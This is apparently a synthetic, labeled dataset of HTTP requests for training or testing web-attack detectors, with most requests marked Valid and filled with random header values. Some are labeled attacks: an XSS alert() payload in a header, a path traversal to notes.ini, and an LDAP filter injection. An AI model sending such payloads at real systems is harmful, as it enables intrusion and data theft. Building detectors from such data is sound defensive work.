Via: 7.1 www.rs0tso3t.jpeg, 3.2 www.lIei3at2.shtml
Transfer-Encoding: deflate
Upgrade: mja7/2.8, uir/4.7, nlrofw/0.2, us2ilt/5.4
Warning: 409 239.183.137.136 "kwybnsisahj2Sco" "Sun, 04 Dec 05 21:19:44 UTC"
X-Forwarded-For: 103.115.185.154
X-Serial-Number: 7592797493312
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19699
Start - Id: 21587
class: Valid
GET /9Yml/pfBpDWeCUpxE6yG/apKr5g9Ks4/metaOGopenAnodexrN/drop@iQNqN/nabj4HocNHcX/eG1eaRqfgehTo.js?Thehe2cwhtrlh7s=ohbdey%3B&hloTs06ftnerhs=rs8- HTTP/1.0
Host: www.fSoT.uk
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: x-mac-arabic
Accept-Encoding: deflate, deflate, compress;q=0.9, compress
Accept-Language: *;q=0.7
Cache-Control: max-stale
Client-ip: 200.137.77.135
Cookie: ojnte3smhoisa=hAp56mrTet9cytmiHl;mre=gatpsi
Cookie2: $Version="58"
Date: Sun, 11 Mar 07 12:11:00 CET
ETag: W/"OMZwIs6Bxvpqs61r"
Expect: eIxaen4e=2auh;bWPne7g
From: octEhy@eenoS.org
If-Modified-Since: Wed, 17 Feb 10 08:55:31 UTC
If-Unmodified-Since: Wed, 05 Dec 07 08:53:37 CET
If-Match: *
If-None-Match: ".14CsrXT.EUWJJlUA"
If-Range: Fri, 13 Jan 06 20:34:23 GMT
Max-Forwards: 767
MIME-Version: 4.7
Pragma: l='saiO'
Proxy-Authorization: Digest nc=69Fc9563
Authorization: Digest algorithm=MD5
Range: 2-,639-89,039-12407
Referer: http://Rrho.st/oSmWiee/ren5arn/aegcTo/nieru3s/csea.avi
TE: trailers,deflate,trailers
Trailer: Accept-Encoding
User-Agent: sSMYiLY3s http://www.scte.st
UA-CPU: x86
UA-Disp: 357,5188,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1645x752
Via: 8.1 190.143.149.164, 4.1 www.eeesohoe.jpeg
Transfer-Encoding: compress
Upgrade: blnen/8.7
Warning: 906 www.0bBaahO.html "iyyOei" "Thu, 02 Feb 06 10:40:07 UTC"
X-Forwarded-For: 99.21.116.3
X-Serial-Number: 0418048557333038
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21587
Start - Id: 23675
class: Valid
GET /9evoo/otanupig/amlskatsdtnniyylt5b/AaOICf3OCAS/X1zFEdYIKe/_VC/4dd8aOrii8lwnsae/nsJ22wDSYLelDxp7JM2S/crdXOM0o_3N5/.TTN.71IOAsj.gif? HTTP/1.1
Host: 54.14.66.18:94135
Connection: keep-alive
Accept: application/postscript;q=0.6, image/jpeg;q=0.9, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: oRhds-Pu9h;q=0.9, aRfxdT-moispl3;q=0.7, honu-sutoOqal;q=0.7
Cache-Control: no-cache
Client-ip: 11.157.68.9
Cookie: itluaji6wrfast=29;aastoob=salsdimr;Es=urbMmtGg
Cookie2: $Version="9"
Date: Wed, 04 Jun 08 05:22:09 GMT
ETag: "_-.owMW@XH@iS7SkUs"
Expect: hotxeoT=ssSrx
From: lanon@fBeece5si.gov
If-Modified-Since: Wed, 22 Jun 05 13:02:23 GMT
If-Unmodified-Since: Tue, 25 Oct 05 22:51:04 GMT
If-Match: "uclM3f8eD1w-Keri"
If-None-Match: *
If-Range: *
Max-Forwards: 353
MIME-Version: 0.9
Pragma: m4hhubmi='o'
Proxy-Authorization: Digest uri=/c3Km.msf
Authorization: Basic ZG5hZW06aXA5Y3Jldw==
Range: 39769-5373,359385-
Referer: http://www.ewmlr.ch/foiD.aspx
TE: deflate,trailers
Trailer: From
User-Agent: Mozilla/5.9 (compatible; MSIE 5.1; SunOS sun4u; e08v; 87tacrz; dmoen6e)
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: d8eaao/2.2 www.kdetbq.css, 9.2 www.eTi6yco.png
Transfer-Encoding: compress
Upgrade: 85ipnt/6.3, atout/3.2
Warning: 628 67.26.215.19 "pv5dhesasmwm" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23675
Start - Id: 13312
class: Valid
GET /s3cet4o8iisse/h8Db_Qi/8QnzMJB3WQNev4gGYbW/t76@orhj/aldhhpyhnbsa5hnlsO/nm_rRnfKCJP2Sx9q/oetsnn1tNiw6a5otoet/flDz3/uNd/oZ016kl-_9.jsp?uali=iWSX3cQ&leenteei=tcePoNt2tclRf&en=hc&ahLliuSweu0btat=sa%40ta&2ro0rtdsf9ofd75=rpE9pNrah&Zlibg5jpimgZ=bZG%40Ko99L&nndtshg=i&emsgCtntnL9tin=o9bp1vSt8netoa&Mv8L4eoroiaemeg=nfugdMhbe&7ljvtaos0jsTtf=varar9riehearnr&dxut=066221&IB.e=bodyoc+&tfincr4hSci1=3%27saapeu9%25 HTTP/1.1
Host: 226.194.201.227
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: gctd-hnieTeiR;q=0.4, sn-hridTeti
Cache-Control: max-age=814
Client-ip: 48.214.167.96
Cookie: as7let2h7omeu=537
Cookie2: $Version="82"
Date: Sun, 10 Dec 06 21:47:18 CET
ETag: W/"wRtsmOaMQA1-w3n"
Expect: t5Inns8i=dicfi
From: vis1fi@seiyZ1s.uk
If-Modified-Since: Sun, 19 Apr 09 02:43:24 UTC
If-Unmodified-Since: Wed, 20 Aug 08 21:33:23 CET
If-Match: "aoaUe7_PBTK5_pn"
If-None-Match: "jpDVmXxRbj3eGVpN"
If-Range: Tue, 14 Nov 06 14:59:19 GMT
Max-Forwards: 2777
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic aG9vZjp0bzlhZW8=
Authorization: Digest qop=auth-int
Range: 85-22
Referer: /snrt/souoh/t90rdafa/dchh/isb3atw.php3
TE: deflate,trailers,deflate;q=0.4
Trailer: TE
User-Agent: Mozilla/6.6 (X11; U; Open BSD i386 8.1; on-4i; rv:5.2.9) Gecko/06248540
UA-CPU: Sparc
UA-Disp: 537,5554,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1944x150
Via: FTP/0.7 159.127.22.166, sTor/0.6 www.n4n8.css, nsl4/3.2 www.titz.gif:78524
Transfer-Encoding: deflate
Upgrade: cRSP/8.6, no8s/8.1, 7spiw/8.5
Warning: 546 55.226.25.251 "gesRteed" "Sat, 17 Feb 07 08:12:13 UTC"
X-Forwarded-For: 224.201.232.196
X-Serial-Number: 2177345757
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13312
Start - Id: 30475
class: Valid
GET /1_Aq9C/ac7JU58B6frompt/e6eciob89/yit64i.html?R5Gg0dut=5tpjbNr9&5rRpHK-4=tcobheio5rto+%3A%7Ed&tubudneslino6t=cttf8ercb&J0SN-xterm3=eeebccatmcdres&lmyicdyrt=%7CeorTh%28%5Bwinnt&hIlae=usrct+sta&JWYoi73_tK=ecworpasswd HTTP/1.0
Host: www.eaEsza.cz
Connection: iaof
Accept: video/*;q=0.6, text/*
Accept-Charset: x-mac-chinesesimp, x-mac-japanese, x-mac-arabic;q=0.1, iso-8859-5;q=0.8
Accept-Encoding: gzip, deflate, identity, identity;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 38.135.23.56
Cookie: i2ey3e=bho8eilgdtg@in;acilawArSnsT=32991;IaIeiooen=ejrebsoptk;audltgenzrdlr6=lesnw
Cookie2: $Version="618"
Date: Fri, 06 Feb 04 15:45:08 UTC
ETag: "sQZuEaBZZ1KnlYi4fa"
Expect: Tell
From: eashaooo@aFOseet.de
If-Modified-Since: Tue, 13 Sep 05 20:45:28 UTC
If-Unmodified-Since: Wed, 07 Sep 05 17:47:29 UTC
If-Match: *
If-None-Match: "9Vx2HCga@vUCDndr"
If-Range: *
Max-Forwards: 2673
MIME-Version: 9.4
Pragma: l3rquX=ntj
Proxy-Authorization: Basic cHRvMDA6ZHNhdG5j
Authorization: NTLM ZUJlbjV5UnE1MmVmb3plTGdubWFpZnNnM25ocG9FZUFyRGthbWl0czB1Z2E=
Range: 91843-5,671-2
Referer: http://www.tpor.cz/qittQEn/ilOe.jsp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: htaaoroeE/4.9.7.1.5
UA-CPU: x86
UA-Disp: 264,406,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 710x3564
Via: efhh/8.5 173.175.135.117
Transfer-Encoding: gzip
Upgrade: cjq9gf/9.4, lrylin/0.7
Warning: 817 212.234.225.102 "oabwt3sj6anocoi" "Sat, 09 Dec 06 19:18:18 GMT"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30475
Start - Id: 46631
class: XSS
GET /wv/nr/libbgsoundunionddX6NTpVXSj/m4i7nnksmh/SvStoUawgseiMdrnay/wLXBtmWY-.RHKu/u63eaOmOhoce6/d0/Rgggfro/ee5soenl2mttotoAhr/amEtrlathydf93i.jpeg?OgTu6uRC=MErtuflory&crhsuq6a=52&xcteehrefD=sdee1&3rrld=r8etcq%3Et+mtbodyde%24%25uses&00shutdownxPCH60l=znt+2a%2F7tEn%5Cxtermlcr+Tw%28&ps=niv8xFUi&ilni=6073068&qh=e%3E&biodse=9nodelink-6&rdt=ihintrvm++sgov%7Ehttps8hi&esefr=odri0wno&ad3nm8qtio9Ndc=%3Dd&thren=3894666&Lieri=t1C9R1FX21Iq&sasmhsrult=4637541 HTTP/1.1
Host: www.xzd4malfg.fr
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, iso-8859-6;q=0.5, cp-936
Accept-Encoding: 
Accept-Language: &{[alert  ('8esr');]};
Cache-Control: no-transform
Client-ip: 219.150.217.95
Cookie: 3wjhttpS@67=65
Cookie2: $Version="5"
Date: Tue, 31 Mar 09 06:23:35 UTC
ETag: W/"zoenLZIy2Xkfo@ynfz"
Expect: vetise=ab4eliOb
If-Modified-Since: Mon, 12 Dec 05 02:31:07 UTC
If-Unmodified-Since: Wed, 15 Nov 06 22:43:45 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 50
MIME-Version: 2.9
Pragma: anR=nde2tn
Proxy-Authorization: NTLM c2hkbDNhbmRhMGVJbGluUmN3MW9zM2VlbFdleHFpZWhBbmFzaURmOW1tZG8xeg==
Authorization: uwsnu itseo=idiuplw
Range: 516737-,3-
Referer: /tOwabiHe/s6qgd/HEtan.php4
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.9 (compatible; Konqueror/9.4; Linux i586; tnmsirh; aiicbh)
UA-Pixels: 7335x113
Via: 6.5 www.efei9art.tiff
Transfer-Encoding: identity
Upgrade: Ecza/9.5
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46631
Start - Id: 45133
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.tidbnn16.st
Connection: keep-alive
Accept: text/plain
Accept-Charset: us-ascii;q=0.1, euc-kr, utf-8;q=0.0
Accept-Encoding: gzip;q=0.0
Accept-Language: esieoae-5u6;q=0.9, eomIn-gacvt, ddout-oeilAug, sa5cnff-y7tamat, gtheElc-8mt
Cache-Control: only-if-cached
Client-ip: 175.81.181.89
Cookie: eCaoEedeah=57915802;ey6yewmoa=SerAt
Cookie2: $Version="6"
Date: Mon, 10 Aug 09 07:25:52 GMT
ETag: W/"qlX4ysgfATZLcpalHWf0"
Expect: 100-continue
From: afmCdmi@eoebf6ie.gov
If-Modified-Since: Tue, 07 Jun 05 15:56:38 CET
If-Unmodified-Since: Sun, 06 Mar 05 19:41:35 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Dec 09 23:16:24 UTC
Max-Forwards: 701
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: 6wbHod ntpheho=riwgh
Range: -3,456-488022
Referer: http://www.Hpxl.gov/otesn/yeqe/ixm0oMb/sriahha.tiff
TE: deflate;q=0.4,trailers,gzip;q=0.0
Trailer: Host
User-Agent: E0foemdudc (2yAfw71Pos; r08.JC; miSLFDcm5S; myQhnrZ; epzJM4-S)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0464x327
Via: FTP/7.6 www.trsl.jpeg, eia/5.1 248.65.64.243:0, HTTP/0.3 www.scdeq.shtml
Transfer-Encoding: xnrmir
Upgrade: rnttO/3.2, lWf/3.6
Warning: 025 www.nahlde.gif "eybt2rrxaltN" "Sat, 01 Dec 07 10:33:12 UTC"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45133
Start - Id: 9325
class: Valid
GET /eaccess_loglinkSdelete/gPma22j.kt4CXD/rBoemrInqqandhOttssd/Vs/eOoc9iwm2hdnahtl7o6o/yeAvtnic/rnGE7wFwn/onuebes3osa/nRdCZGwdAF16_tzP-H/huunu/eZ8O941HfT.cfm?H0PXXinFs=sNAxzSvL&naada=t23&xiee=563&nEhooeelswm=632713&iea5nnirf7=9829392&lntCd4me=tprawndsg3dka&lie4an8etn=00551637&lbsl0buEog=omi%3C%3Dr+metafh%3DtOt&mOietze=hR&hnetn=8987&vpDeHso6nerC=857980 HTTP/1.0
Host: 76.1.236.43:4413
Connection: keep-alive
Accept: text/*, application/zip;q=0.8, application/*;q=0.9
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: min-fresh=5088
Client-ip: 188.125.171.246
Cookie: l8ibfhta=45340137;mEsmgnas=7CeMj_o;oGnpaccfv9dfeeh=deensnce3tt1soe5o;myuTbi=tt
Cookie2: $Version="75"
Date: Sat, 02 Jan 10 11:54:21 GMT
ETag: "EoKCZVJzOT0CrUv9L"
Expect: dtuwo
From: aorhle@n0oang.st
If-Modified-Since: Tue, 19 Jul 05 14:50:30 CET
If-Unmodified-Since: Mon, 17 Oct 05 09:22:39 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 07 Jun 04 19:51:24 UTC
Max-Forwards: 10
MIME-Version: 5.7
Pragma: tedaif=ydno
Proxy-Authorization: agimi errEPr=aHaa
Authorization: Basic ZXI1cmtucjpjc29zbnI=
Range: 7-,599-,-17
Referer: http://www.i0noc8yd.biz/n8seXed/leodq/tndagV.pdf
TE: gzip,deflate,trailers
Trailer: Via
User-Agent: Mozilla/9.5 (Windows; U; Win98 4.7; ri-Ie; rv:5.0.5) Gecko/22393092
UA-CPU: 68000
UA-Disp: 8128,195,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 766x0669
Via: 3.9 www.uanma.js, HTTP/1.2 www.haNp.htm:25766
Transfer-Encoding: compress
Upgrade: enhHu/9.9, 1see8/1.3
Warning: 040 www.ojuu.gif "ngtctI" "Thu, 08 Mar 07 22:46:35 CET"
X-Forwarded-For: 135.104.235.17
X-Serial-Number: 14383442486
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9325
Start - Id: 349
class: Valid
GET /aOSObVsQxd6G/cmdh/oRwKOFQ82t/lpaa1rioROmto/m0diucdhrfMti/yoLovi/mlVRM1.tiff?nxnl=libchildoe%3C&zini8=64&s5nnihstdfsehd=emi1b&vi=+luM%26tEtruobjectibt&cto=5350382&mLaetoelrmor0e=v%3Aeo%40oolssl%40acaz%5Bl&qhzfRA0a9ZN=eelIi62du&adueevce5=wah3Ce+%25Eemkeaaumtmpnph-4&heudso6s=epLOO HTTP/1.1
Host: www.abcadtden.de:80
Connection: close
Accept: video/*
Accept-Charset: macintosh;q=0.0, iso-8859-1;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: Sebonte-s;q=0.4, 4-tceTo, 0irhe-fee3tM
Cache-Control: no-transform
Client-ip: 192.168.223.13
Cookie: amoxGIC=cdVv-37fS;tfnshanc=94514825;oeToo= window.openca;dsnh=vea0moigiOh8link;NTe3S=3985318
Cookie2: $Version="1"
Date: Thu, 22 Jan 09 14:35:48 GMT
ETag: "LPZN0wX54lCt.v_"
Expect: 100-continue
From: elrw@cgtkla.cz
If-Modified-Since: Tue, 24 Feb 09 07:19:21 CET
If-Unmodified-Since: Sun, 14 Feb 10 10:10:44 GMT
If-Match: *
If-None-Match: *
If-Range: "xhR.7OmblyfHRRLucf"
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: ij0Eer rloelns=wlsh1o
Range: -723325,-8,2410-
Referer: /e6ney6/vv2ttotp/ethuko.rar
TE: chunked;q=0.7
Trailer: Range
User-Agent: oG_s3tD http://www.ahtteota.de
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 170x4525
Via: HTTP/2.7 0.157.158.105:57471, 1.8 www.fagco7qt.gif, 6.7 www.lzSsii.htm
Transfer-Encoding: gzip
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 856 133.9.23.161 "adbfddinDnmgns" "Wed, 17 Feb 10 19:40:50 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 21682850454988590168
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 349
Start - Id: 27120
class: Valid
GET /eJwU1RkPaxODMA/n8aPdDUGwm/e95Qa-O59pT/ie71ita/Ij5rHedDteprge/xtodfodce8ga65k.js?ehathbnbmnEtEN=jxFhhk&PD1sPihqGP=321928&JHbin9jT=gwach%3Cne&5rflceDc=-3tpe+%26%3ENeo HTTP/1.0
Host: www.etio.be
Connection: close
Accept: image/*;q=0.2, application/*;q=0.0, application/*
Accept-Charset: euc-jp;q=0.7, hz-gb-2312, iso-8859-8;q=0.7
Accept-Encoding: gzip;q=0.3, gzip;q=0.4
Accept-Language: 6nRlueuh-fhO4a, o1i0t2t-icedqt, erx-ossSv;q=0.4, fettd4-Rww, nmf-wa2
Cache-Control: only-if-cached
Client-ip: 33.122.90.124
Cookie: wla0sy0vet6ne7=P/t;OdgvoN=969141;hlE=93cmd
Cookie2: $Version="926"
Date: Thu, 10 Aug 06 24:17:15 CET
ETag: "cR@krZP4Fect@PPa6kM0"
Expect: 100-continue
From: inus@dRaNud.gov
If-Modified-Since: Fri, 30 Nov 07 12:47:00 GMT
If-Unmodified-Since: Thu, 17 Aug 06 01:54:43 GMT
If-Match: "Li_c1TmrDFKOFZUxS"
If-None-Match: "G7K7vSAqwVvDBkMzf"
If-Range: "zP_rd9.22DlUWuYg"
Max-Forwards: 7
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: diom hfoioe=rrah
Range: 17545-664
Referer: /6aha/aibcphRt/Yeu7eyn.fgf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/7.7 (Windows; U; Win98 2.3; dn-cr; rv:1.9.4) Gecko/00507973
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 419x0757
Via: gge5i/8.1 80.134.251.118
Transfer-Encoding: gzip
Upgrade: n69/4.0, e0im/7.8, aene/5.3, mph/0.9, eeemie/5.5
Warning: 361 33.94.112.30 "aaityoctToiledbg" "Sun, 07 Sep 08 12:23:37 GMT"
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: -----------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27120
Start - Id: 4137
class: Valid
PUT /sock_streamfEg/2co5I/ib9FQFY/rgqht/o3/s7urakbnmchse4Kisei/wqthctZnLJ/.TQ9ovar_8zC/qTanntaSeEz/tD8B/ebu41.jpeg? HTTP/1.0
Content-Length: 169
Content-Language: lh
Content-Encoding: deflate
Content-Location: /aitszaPh.jpg
Content-MD5: dnBybmVyYXR4cGdpZWFScA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 13:54:35 GMT
Last-Modified: Fri, 16 Sep 05 18:52:27 CET
Host: 96.191.223.252
Connection: eazlw
Accept: audio/basic;q=0.2, text/xml, image/*;q=0.7
Accept-Charset: shift_jis, windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=957
Client-ip: 28.34.213.111
Cookie: tEgietsona=3ihaioltn3nktd;kmgudcwoheu=83108419;ORW@cKASpe=eott7eU
Cookie2: $Version="8"
Date: Thu, 06 Mar 08 10:22:24 GMT
ETag: "TDLgR00qH-8h7@bqU"
Expect: nnith=vweeho;9cba
From: rwet72e@ewitgcyH.be
If-Modified-Since: Sun, 30 May 04 08:10:38 UTC
If-Unmodified-Since: Fri, 14 Jan 05 20:32:55 GMT
If-Match: "GF6YM7yS8oQ@FDpeu"
If-None-Match: *
If-Range: Thu, 16 Apr 09 09:22:04 GMT
Max-Forwards: 4154
MIME-Version: 7.4
Pragma: arf='dtujlh'
Proxy-Authorization: aisesf nMetM=q8cte1s
Authorization: Basic Y2VlcmhlNWk6aWl3ZnU=
Range: 981106-,64119-357939,-1
Referer: /w9eeIiuc/ieb9/ugoltOo.html
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.3 (Machintosh; U; PPC Mac OS X 1.6; id-tR; rv:4.3.9) Gecko/25521555
UA-CPU: PowerPC
UA-Disp: 192,906,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1351x0300
Via: Oux/3.6 30.53.156.190, 5.8 www.9jae.js
Transfer-Encoding: deflate
Upgrade: Wt5gze/3.4, ehs/6.1, se5aa/4.8, 7os/4.3, b3hst/0.5
Warning: 826 40.134.212.239:799 "oazhouehnn3r" 
X-Forwarded-For: 120.79.175.50
X-Serial-Number: 696921203220744
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

anmotitaoe=dme8etarieolencx&vsheknpliz=l5hh5hmnr&st84bgdnyu=i<sbst~tncsres3systemoi4&traD3bf=peeao3htuvi3&ddqiuuyd=y5hzOvn9fW&9ms=56&x2YI4J=)seh&szetakei4sm=198362

End - Id: 4137
Start - Id: 12072
class: Valid
GET /esd4eitkiey9sftabmo/neiadeoeotawem/erdeaTotiah7n8n.php3? HTTP/1.1
Host: 214.199.152.155
Connection: emenh
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, identity;q=0.0, gzip;q=0.3, compress
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 36.177.206.82
Cookie: soesm=4939235997
Cookie2: $Version="7"
Date: Mon, 15 Aug 05 11:03:06 GMT
ETag: "TD5trH1JHig-axgCFnTv"
Expect: 100-continue
From: etve6nr2@hnieae.cz
If-Modified-Since: Wed, 09 Jul 08 23:45:08 UTC
If-Unmodified-Since: Fri, 03 Sep 04 08:34:50 GMT
If-Match: "QvEsB7gp7DPe8K49"
If-None-Match: "m_MyeTfV_DUiKnNO2yB"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: yrn='e'
Proxy-Authorization: NTLM bjV0bmludXJhR3BuZWlkYXRkb21ub25lbFpsbm50U29jaXZqYXNlZg==
Authorization: NTLM OWhzOHNlMGx0bjlhcnVhblR0aXR3dnBpdFRBd29zdEVucmlsbmZzeQ==
Range: -2
Referer: /muanaeA/oe0wa92e/ssnpjree/tcsiiab/s8egveo.php3
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/7.3 (compatible; Konqueror/7.9; Open BSD i386; hemeca; bs1ehbee)
UA-CPU: MIPS
UA-Disp: 750,6227,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 701x262
Via: 2.4 13.86.12.180, 1nf3Hh/5.1 204.35.107.63, 7.7 158.118.51.166:97670
Transfer-Encoding: identity
Upgrade: eoPrtm/3.6, odfe/2.3, Iorla/2.0, tdlt/6.3
Warning: 066 www.zaynf.html "odsompreoosngeawd" "Sun, 21 Jun 09 24:00:24 GMT"
X-Forwarded-For: 149.30.227.159
X-Serial-Number: 987751
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12072
Start - Id: 18412
class: Valid
GET /emuiljE9ulsver/r0K.shtml?6eetlb=17&a1grge=67424858&aqnv=664489&ncef=mij_%4009al1f3&YjupdateIH=0iaf&tstenbnuidi=ealgle+wzdEahy&msoeotoerhronO=stme7omochaiwhereeeav&7fgnri=umdtvde&dn6aC=557621 HTTP/1.1
Host: 78.10.174.232
Connection: close
Accept: */*
Accept-Charset: koi8;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 183.39.30.120
Cookie: sidtomrdricseme=am05pePpmSqn;nyaR5tp=li;s5nwBqczov9m=rhtaccesthdeleten9?r;o4nhyNhfssertv=ns7;tth=024722
Cookie2: $Version="5"
Date: Thu, 29 Jun 06 08:56:02 CET
ETag: W/"MgltMTz0K8OY2ncAsiKt"
Expect: eeic
From: 1hniea@u4rmt.it
If-Modified-Since: Thu, 14 Dec 06 01:50:27 CET
If-Unmodified-Since: Sat, 21 Nov 09 11:16:02 UTC
If-Match: *
If-None-Match: *
If-Range: "Z87sXn.yxrThEZhW"
Max-Forwards: 128
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: Digest response="eC879ecDc5cdC68D8bFDA9bAE7DF5BB6"
Range: 0752-,8-,-9405
Referer: http://www.eezlg.st/alAo5.exe
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/2.1 (X11; U; Linux i386 6.5; mn-it; rv:2.4.7) Gecko/46843189
UA-CPU: 68000
UA-Disp: 1388,0404,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 342x6218
Via: 7.3 225.218.64.138, HTTP/3.4 65.148.16.11:93750
Transfer-Encoding: identity
Upgrade: fr6/9.1, a7d/9.3, ieeyad/2.3, bel/9.8, 1ryi/9.2
Warning: 382 234.104.119.196 "nOJdiaeAxptcthqErre" 
X-Forwarded-For: 157.164.79.230
X-Serial-Number: 2956272403318008567
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18412
Start - Id: 38412
class: LdapInjection
GET /ktuar8imnnaeo.cfm?tontttrtpqdoi=ai_VQPG-&sa=e19i-ANYsI0L&abknaoh=etw&et=4&sHvs=afugfgIedc&hTemEejao5Du=%29++++%28%7C+%28cn%3D*o+++%27brien*%29%28mail++%3D*o%27brien*+++%29+&f5oKeas2=23&ihnofxaVtrsdTot=wRZ HTTP/1.0
Host: 10.202.225.17:80
Connection: yrtsoa
Accept: image/*;q=0.4, video/quicktime;q=0.8, application/*;q=0.4
Accept-Charset: iso-8859-8-i, cp-932
Accept-Encoding: *
Accept-Language: xiic-tis, imm59-E8hsojNh, T-eSfshe;q=0.9, a1en-n, ArfaahwR-x4sRb;q=0.6
Cache-Control: no-store
Client-ip: 134.194.27.49
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="974"
Date: Wed, 06 May 09 06:21:07 UTC
ETag: "wl@UfNXB1fE.YUPM_nzA"
Expect: 100-continue
From: r8urdpH@atna.uk
If-Modified-Since: Sat, 14 Nov 09 02:51:05 UTC
If-Unmodified-Since: Sat, 12 Mar 05 03:51:09 UTC
If-Match: "g6eR1UQj63r5t_jnG"
If-None-Match: *
If-Range: Tue, 18 Apr 06 01:20:04 GMT
Max-Forwards: 260
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: h80n hmasNo=a0xee
Authorization: Basic YXJkbzplaWhwdHQ=
Range: -96373
Referer: http://www.Ttcs.cz/anqeu/iuaiu/rt2i3es.ace
TE: trailers,deflate;q=0.1
Trailer: Max-Forwards
User-Agent: rEoipwFeNHuEcaanhdn
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0696x1408
Via: 0.6 www.hpmIshll.tiff, on1rs/5.7 243.91.73.78, FTP/4.6 9.70.189.10
Transfer-Encoding: compress
Upgrade: Elgm/6.3, hea/6.4, She/5.1, dol/2.2
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38412
Start - Id: 30750
class: Valid
